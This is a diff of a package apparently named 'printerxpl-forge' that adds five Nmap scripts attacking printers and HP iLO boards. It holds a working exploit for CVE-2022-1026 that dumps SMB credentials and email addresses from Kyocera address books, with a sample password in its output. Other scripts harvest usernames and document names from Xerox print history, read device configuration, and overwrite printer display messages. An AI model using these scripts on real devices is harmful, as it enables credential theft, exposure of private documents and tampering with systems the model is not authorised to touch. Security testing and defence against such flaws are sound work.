printerxpl-forge 6.2.0__py3-none-any.whl

nse/scripts/http-hp-ilo-info.nse

@@ -0,0 +1,121 @@
+description = [[
+Attempts to extract information from HP iLO boards including versions and addresses.
+
+HP iLO boards have an unauthenticated info disclosure at <ip>/xmldata?item=all.
+It lists board informations such as server model, firmware version,
+MAC addresses, IP addresses, etc. This script uses the slaxml library
+to parse the iLO xml file and display the info.
+]]
+
+---
+--@usage nmap --script hp-ilo-info -p 80 <target>
+--
+--@usage nmap --script hp-ilo-info -sV <target>
+--
+--@output
+--PORT   STATE SERVICE
+--80/tcp open  http
+--| ilo-info:
+--|   ServerType: ProLiant MicroServer Gen8
+--|   ProductID: XXXXXX-XXX
+--|   UUID: XXXXXXXXXXXXXXXX
+--|   cUUID: XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXX
+--|   ILOType: Integrated Lights-Out 4 (iLO 4)
+--|   ILOFirmware: X.XX
+--|   SerialNo: ILOXXXXXXXXXX
+--|   NICs:
+--|     NIC 1:
+--|       Description: iLO 4
+--|       MacAddress: 12:34:56:78:9a:bc
+--|       IPAddress: 10.10.10.10
+--|       Status: OK
+--|     NIC 2:
+--|       Description: iLo 4
+--|       MacAddress: 11:22:33:44:55:66
+--|       IPAddress: Unknown
+--|_      Status: Disabled
+--
+
+author = "Rajeev R Menon"
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = {"safe","discovery"}
+
+local http = require "http"
+local slaxml = require "slaxml"
+local stdnse = require "stdnse"
+local shortport = require "shortport"
+
+portrule = shortport.http
+
+function getTag(table,tag)
+  for _,n in ipairs(table.kids) do
+    if n.type == "element" and n.name == tag then
+      return n
+    elseif n.type == "element" then
+      local ret =  getTag(n,tag)
+      if ret ~= nil then return ret end
+    end
+  end
+  return nil
+end
+
+function parseXML(dom)
+  local response = stdnse.output_table()
+  local info = stdnse.output_table()
+  info['ServerType'] = getTag(dom,"SPN")
+  info['ProductID'] = getTag(dom,"PRODUCTID")
+  info['UUID'] = getTag(dom,"UUID")
+  info['cUUID'] = getTag(dom,"cUUID")
+  info['ILOType'] = getTag(dom,"PN")
+  info['ILOFirmware'] = getTag(dom,"FWRI")
+  info['SerialNo'] = getTag(dom,"SN")
+
+  for key,_ in pairs(info) do
+    if info[key] ~= nil then
+      response[tostring(key)] = info[key].kids[1].value
+    end
+  end
+
+  response.NICs = stdnse.output_table()
+  local nicdom = getTag(dom,"NICS")
+  if nicdom ~= nil then
+  local count = 1
+  for _,n in ipairs(nicdom.kids) do
+    local nic = stdnse.output_table()
+    info = stdnse.output_table()
+    for k,m in ipairs(n.kids) do
+      if #m.kids >= 1 and m.kids[1].type == "text" then
+        if m.name == "DESCRIPTION" then
+          info["Description"] = m.kids[1].value
+        elseif m.name == "MACADDR" then
+          info["MacAddress"] = m.kids[1].value
+        elseif m.name == "IPADDR" then
+          info["IPAddress"] = m.kids[1].value
+        elseif m.name == "STATUS" then
+          info["Status"] = m.kids[1].value
+        end
+      end
+    end
+    for key,_ in pairs(info) do
+      nic[tostring(key)] = info[key]
+    end
+    response.NICs["NIC "..tostring(count)] = nic
+    count = count + 1
+    end
+  end
+  return response
+end
+
+action = function(host,port)
+  local response = http.get(host,port,"/xmldata?item=all")
+  if response["status"] ~= 200
+    or not response.body
+    or not response.body:match('<RIMP>')
+    or not response.body:match('iLO')
+  then
+    return
+  end
+  local domtable = slaxml.parseDOM(response["body"],{stripWhitespace=true})
+  return parseXML(domtable)
+end
+

nse/scripts/http-info-xerox-enum.nse

@@ -0,0 +1,101 @@
+local http = require("http")
+local stdnse = require "stdnse"
+local string = require "string"
+
+description = [[
+Enumerates usernames, hostnames and documents from the print history 
+of Xerox Centreware Internet Services printers.
+
+Use the argument <code>xerox.port</code> to specify a non standard port.
+
+Note: it is normal for the document names to be truncated as they are
+normally truncated in the response.
+]]
+
+--@usage
+--@arg xerox.port specify non standard port
+--nmap -p 80 --script=http-printer.nse --script-args xerox.port=80 192.168.50.46 
+--@output
+--Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-14 11:44 EDT
+--Nmap scan report for PHRACK-PNT-MAIN.phrack.com.au (192.168.50.46)
+--Host is up (0.024s latency).
+--
+--PORT   STATE SERVICE
+--80/tcp open  http
+--| http-printer: 
+--| -- Usernames:
+--| slakin
+--| jburrows
+--| citrix-svr
+--| -- Hostnames:
+--| PHRACK-HQ-PRN
+--| PHRACK-HQ-ADDS
+--| PHRACK-HQ-MAINT
+--| -- Documents:
+--| Microsoft Outlook - Memo Style
+--| Microsoft Word - Rach.doc
+--| Microsoft Word - Document1
+--| PayAdvicesEx.pdf
+--| Payslip - 10May2023 - John.pdf
+--|_Test Page
+
+
+author = "Shain Lakin"
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = {"safe", "discovery"}
+
+portrule = function(host, port)
+  local port_number = tonumber(stdnse.get_script_args('xerox.port')) or 80 
+  return port.number == port_number and port.protocol == "tcp"
+end
+
+local function insert_unique(t, value)
+  for _,v in ipairs(t) do
+    if v == value then return end
+  end
+  table.insert(t,value)
+end
+
+action = function(host, port)
+  local url = "/job/logsys.htm"
+  -- Fetch job history 
+  local response = http.get(host, port.number, url)
+  stdnse.print_debug(response.body)
+  if not (response.status == 200) then
+    return("Invalid target")
+  end
+
+  -- Parse document names
+  local documents = {}
+  for document in string.gmatch(response.body, '<td class=jobhistory_1>(.-)</td>') do
+    if document ~= "" then
+      insert_unique(documents, document)
+    end
+  end
+
+  -- Parse usernames
+  local usernames = {}
+  for username in string.gmatch(response.body, '<td class=jobhistory_2>(.-)</td>') do
+    if username ~= "" then
+      insert_unique(usernames, username)
+    end
+  end
+
+  -- Parse hostnames
+  local hostnames = {}
+  for hostname in string.gmatch(response.body, '<td class=jobhistory_3>(.-)</td>') do
+    if hostname ~= "" then
+      insert_unique(hostnames, hostname)
+    end
+  end
+
+  if #usernames > 0 and #hostnames > 0 and #documents > 0 then
+    local output = "\n-- Usernames:\n" .. table.concat(usernames,'\n') 
+    output = output .. "\n-- Hostnames:\n" .. table.concat(hostnames, '\n') 
+    output = output .. "\n-- Documents:\n" .. table.concat(documents, '\n')
+    return output
+  else
+    return "No job history found"
+  end
+end
+

nse/scripts/http-vuln-cve2022-1026.nse

@@ -0,0 +1,158 @@
+local http = require("http")
+local stdnse = require "stdnse"
+local string = require "string"
+
+
+description = [[
+Recovers SMB credentials and Email addresses from the
+address book of vulnerable Kyocera mutifunction printers.
+
+Kyocera multifunction printers running vulnerable versions
+of Net View unintentionally expose sensitive user information,
+including usernames and passwords, through an insufficiently
+protected address book export function. 
+
+Net view is ran by default over http or https on TCP ports 9090
+or 9091 respectively. To specify a custom TCP port pass the 
+<code>kyocera.port</code> argument.
+
+To only check for vulnerability and skip exploiting the target
+host pass 'true' to the <code>kyocera.skipexploit</code> parameter.
+]]
+
+--@usage
+--nmap --script=http-vuln-cve2022-1026 192.168.50.45
+--@output
+--Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-13 11:12 EDT
+--Nmap scan report for PRINTER01.phrack.com (192.168.50.45)
+--Host is up (0.030s latency).
+--Not shown: 991 closed tcp ports (conn-refused)
+--PORT     STATE SERVICE
+--80/tcp   open  http
+--515/tcp  open  printer
+--631/tcp  open  ipp
+--9090/tcp open  zeus-admin
+--| http-vuln-cve2022-1026: 
+--| -- SMB Credentials
+--| Username: phrack.com\scanmanager
+--| Password: G48n4&##JJKL32$
+--| -- Emails
+--| john.batchelor@phrack.com
+--|_Marcus.Hayden@phrack.com
+--9100/tcp open  jetdirect
+
+--@usage
+--nmap --script=http-vuln-cve2022-1026 --script-args kyocera.port=9090,kyocera.skipexploit=true 192.168.50.45 
+--@args kyocera.port specify alternative TCP port
+--@args kyocera.skipexploit check if vulnerable but do not exploit
+--@output
+--Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-13 11:17 EDT
+--Nmap scan report for PRINTER01.phrack.com (192.168.50.45)
+--Host is up (0.028s latency).
+--Not shown: 991 closed tcp ports (conn-refused)
+--PORT     STATE SERVICE
+--80/tcp   open  http
+--443/tcp  open  https
+--515/tcp  open  printer
+--631/tcp  open  ipp
+--9090/tcp open  zeus-admin
+--|_http-vuln-cve2022-1026: VULNERABLE
+--9100/tcp open  jetdirect
+
+author = "Shain Lakin"
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = {"safe", "exploit", "vuln"}
+
+
+portrule = function(host, port)
+  local port_number = tonumber(stdnse.get_script_args('kyocera.port')) or 9090 
+  return port.number == port_number and port.protocol == "tcp"
+end
+
+action = function(host, port)
+
+  local url = "/ws/km-wsdl/setting/address_book"
+  local headers = {['Content-Type'] = 'application/soap+xml'}
+  local skip_exploit = stdnse.get_script_args('kyocera.skipexploit') or false
+  
+  local post_data1 = [[
+<?xml version="1.0" encoding="utf-8"?>
+<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://www.w3.org/2003/05/soap-envelope" 
+  xmlns:SOAP-ENC="http://www.w3.org/2003/05/soap-encoding" 
+  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" 
+  xmlns:xsd="http://www.w3.org/2001/XMLSchema" 
+  xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing" 
+  xmlns:xop="http://www.w3.org/2004/08/xop/include" 
+  xmlns:ns1="http://www.kyoceramita.com/ws/km-wsdl/setting/address_book">
+<SOAP-ENV:Header>
+<wsa:Action SOAP-ENV:mustUnderstand="true">http://www.kyoceramita.com/ws/km-wsdl/setting/address_book/create_personal_address_enumeration</wsa:Action>
+</SOAP-ENV:Header>
+<SOAP-ENV:Body>
+<ns1:create_personal_address_enumerationRequest>
+<ns1:number>25</ns1:number>
+</ns1:create_personal_address_enumerationRequest>
+</SOAP-ENV:Body>
+</SOAP-ENV:Envelope>
+]]
+
+  -- First POST request
+  local response1 = http.post(host, port.number, url, nil, {}, post_data1)
+
+  if not response1.status then
+    return("HTTP request failed")
+  end
+
+  local enumeration = string.match(response1.body, '<kmaddrbook:enumeration>([%d]+)<')
+
+  if not enumeration then
+    return("NOT VULNERABLE")
+  elseif skip_exploit then
+    return("VULNERABLE")
+  end
+  
+  local post_data2 = [[
+<?xml version="1.0" encoding="utf-8"?>
+<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://www.w3.org/2003/05/soap-envelope"
+  xmlns:SOAP-ENC="http://www.w3.org/2003/05/soap-encoding"
+  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+  xmlns:xsd="http://www.w3.org/2001/XMLSchema"
+  xmlns:wsa="http://schemas.xmlsoap.org/ws/2004/08/addressing"
+  xmlns:xop="http://www.w3.org/2004/08/xop/include"
+  xmlns:ns1="http://www.kyoceramita.com/ws/km-wsdl/setting/address_book">
+<SOAP-ENV:Header>
+<wsa:Action SOAP-ENV:mustUnderstand="true">http://www.kyoceramita.com/ws/km-wsdl/setting/address_book/get_personal_address_list</wsa:Action>
+</SOAP-ENV:Header>
+<SOAP-ENV:Body>
+<ns1:get_personal_address_listRequest><ns1:enumeration>]]..enumeration..[[</ns1:enumeration></ns1:get_personal_address_listRequest></SOAP-ENV:Body></SOAP-ENV:Envelope>
+]]
+
+  -- Second POST request
+  local response2 = http.post(host, port.number, url, nil, {}, post_data2)
+
+  if not response2.status then
+    return("HTTP request failed")
+  end
+  stdnse.print_debug("Raw output:\n" .. response2.body)
+
+  -- Parse email addresses
+  local emails = {}
+  for email in string.gmatch(response2.body, '<kmaddrbook:address>(.-)</kmaddrbook:address>') do
+      if email ~= "" then
+        table.insert(emails, email) 
+      end
+  end
+    -- Parse login credentials
+  local username = string.match(response2.body, '<kmaddrbook:login_name>(.-)</kmaddrbook:login_name>')
+  local password = string.match(response2.body, '<kmaddrbook:login_password>(.-)</kmaddrbook:login_password>')
+
+  if username and password then
+    local output = ("\n-- SMB Credentials:\nUsername: %s\nPassword: %s"):format(username, password)
+    if #emails > 0 then
+        output = output .. "\n-- Emails:\n" .. table.concat(emails,'\n')
+    end
+    return output
+  else
+    return "VULNERABLE but no data available"
+  end
+end
+

nse/scripts/lexmark-config.nse

@@ -0,0 +1,89 @@
+local dns = require "dns"
+local nmap = require "nmap"
+local shortport = require "shortport"
+local stdnse = require "stdnse"
+local table = require "table"
+
+description = [[
+Retrieves configuration information from a Lexmark S300-S400 printer.
+
+The Lexmark S302 responds to the NTPRequest version probe with its
+configuration. The response decodes as mDNS, so the request was modified
+to resemble an mDNS request as close as possible. However, the port
+(9100/udp) is listed as something completely different (HBN3) in
+documentation from Lexmark. See
+http://www.lexmark.com/vgn/images/portal/Security%20Features%20of%20Lexmark%20MFPs%20v1_1.pdf.
+]]
+
+
+---
+--@usage
+-- nmap -sU -p 9100 --script=lexmark-config <target>
+--@output
+-- Interesting ports on 192.168.1.111:
+-- PORT     STATE   SERVICE REASON
+-- 9100/udp unknown unknown unknown-response
+-- | lexmark-config:
+-- |   IPADDRESS: 10.46.200.170
+-- |   IPNETMASK: 255.255.255.0
+-- |   IPGATEWAY: 10.46.200.2
+-- |   IPNAME: "ET0020006E4A37"
+-- |   MACLAA: "000000000000"
+-- |   MACUAA: "0004007652EC"
+-- |   MDNSNAME: "S300-S400 Series (32)"
+-- |   ADAPTERTYPE: 2
+-- |   IPADDRSOURCE: 1
+-- |   ADAPTERCAP: "148FC000"
+-- |   OEMBYTE: 1 0
+-- |   PASSWORDSET: FALSE
+-- |   NEWPASSWORDTYPE: TRUE
+-- |   1284STRID: 1 "S300-S400 Series"
+-- |   CPDATTACHED: 1 1
+-- |   SECUREMODE: FALSE
+-- |   PRINTERVIDPID: 1 "043d0180"
+-- |_  product=(S300-S400: Series)
+
+-- Version 0.3
+-- Created 01/03/2010 - v0.1 - created by Patrik Karlsson
+-- Revised 01/13/2010 - v0.2 - revised script to use dns library
+-- Revised 01/23/2010 - v0.3 - revised script to use the proper ports
+
+author = "Patrik Karlsson"
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+categories = {"discovery", "safe"}
+
+
+portrule = shortport.portnumber({5353,9100}, "udp")
+
+action = function( host, port )
+
+  local result = {}
+  local status, response = dns.query( "", { port = port.number, host = host.ip, dtype="PTR", retPkt=true} )
+  if ( not(status) ) then
+    return
+  end
+  local status, txtrecords = dns.findNiceAnswer( dns.types.TXT, response, true )
+  if ( not(status) ) then
+    return
+  end
+
+  for _, v in ipairs( txtrecords ) do
+    if ( v:len() > 0 ) then
+      if v:find("PRINTERVIDPID") then
+        port.version.name="hbn3"
+      end
+      if not v:find("product=") then
+        v = v:gsub(" ", ": ", 1)
+      end
+      table.insert( result, v )
+    end
+  end
+
+  -- set port to open
+  nmap.set_port_state(host, port, "open")
+  nmap.set_port_version(host, port)
+
+  return stdnse.format_output(true, result)
+end
+
+

nse/scripts/pjl-ready-message.nse

@@ -0,0 +1,106 @@
+local nmap = require "nmap"
+local shortport = require "shortport"
+
+description = [[
+Retrieves or sets the ready message on printers that support the Printer
+Job Language. This includes most PostScript printers that listen on port
+9100. Without an argument, displays the current ready message. With the
+<code>pjl_ready_message</code> script argument, displays the old ready
+message and changes it to the message given.
+]]
+
+---
+-- @arg pjl_ready_message Ready message to display.
+-- @output
+-- 9100/tcp open  jetdirect
+-- |_ pjl-ready-message: "READY" changed to "p0wn3d pr1nt3r"
+-- @usage
+-- nmap --script=pjl-ready-message.nse \
+--   --script-args='pjl_ready_message="your message here"'
+
+author = "Aaron Leininger"
+
+license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
+
+categories = {"intrusive"}
+
+portrule = shortport.port_or_service(9100, "jetdirect")
+
+local function parse_response(response)
+  local msg
+  local line
+
+  for line in response:gmatch(".-\n") do
+    msg = line:match("^DISPLAY=\"(.*)\"")
+    if msg then
+      return msg
+    end
+  end
+end
+
+action = function(host, port)
+
+  local status  --to be used to grab the existing status of the display screen before changing it.
+  local newstatus  --used to repoll the printer after setting the display to check that the probe worked.
+  local statusmsg  --stores the PJL command to get the printer's status
+  local response  --stores the response sent over the network from the printer by the PJL status command
+
+  statusmsg="@PJL INFO STATUS\r\n"
+
+  local rdymsg=""  --string containing text to send to the printer.
+  local rdymsgarg=""  --will contain the argument from the command line if one exists
+
+  local socket = nmap.new_socket()
+  socket:set_timeout(15000)
+  local try = nmap.new_try(function() socket:close() end)
+  try(socket:connect(host, port))
+  try(socket:send(statusmsg))  --this block gets the current display status
+  local data
+  response,data=socket:receive()
+  if not response then  --send an initial probe. If no response, send nothing further.
+    socket:close()
+    if nmap.verbosity() > 0 then
+      return "No response from printer: "..data
+    else
+      return nil
+    end
+  end
+
+  status = parse_response(data)
+  if not status then
+    if nmap.verbosity() > 0 then
+      return "Error reading printer response: "..data
+    else
+      return nil
+    end
+  end
+
+  rdymsgarg = nmap.registry.args.pjl_ready_message
+  if not rdymsgarg then
+    if status then
+      return "\""..status.."\""
+    else
+      return nil
+    end
+  end
+
+  rdymsg="@PJL RDYMSG DISPLAY = \""..rdymsgarg.."\"\r\n"
+  try(socket:send(rdymsg))  --actually set the display message here.
+
+  try(socket:send(statusmsg))  --this block gets the status again for comparison
+  response,data=socket:receive()
+  if not response then
+    socket:close()
+    return "\""..status.."\""
+  end
+  newstatus=parse_response(data)
+  if not newstatus then
+    socket:close()
+    return "\""..status.."\""
+  end
+
+  socket:close()
+
+  return "\""..status.."\" changed to \""..newstatus.."\""
+end
+